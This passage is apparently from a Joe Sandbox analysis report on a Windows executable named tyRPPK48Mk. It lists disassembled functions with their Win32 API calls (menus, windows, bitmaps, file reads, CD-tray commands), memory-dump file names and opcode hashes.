                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$CreateDestroy
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ,$tooltips_class32
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1109047481-3856767331
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemCount.USER32 ref: 00468CFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00468D3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1441871840-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 12c28d3332ad221b92e3a636ba418a85e822d4b5186b1920d2f56c44304fb3db
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460915
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 0046092D
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004609E1
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3631882475-2268648507
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 00461683
                                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00461721
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetParent.USER32(?), ref: 004618C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%u
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1899580136-679674701
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: InfoItemMenu$Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1196289194-4108050209
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c65cffcb0b41bccfc2e749f507a7067f69681543840726e93d819a57ffaed043
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 0043143E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                                                                                                                                                                                                                                                                                                                                                                                • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3300687185-3887548279
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54198b849531af9165e9bec096bf8ea3e4974b91d89a9c814b262d795432971a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                                                                                                                                                                                                                                                                                                                                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1976180769-4113822522
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 461458858-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                                                                                                                                                                                                                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00430113
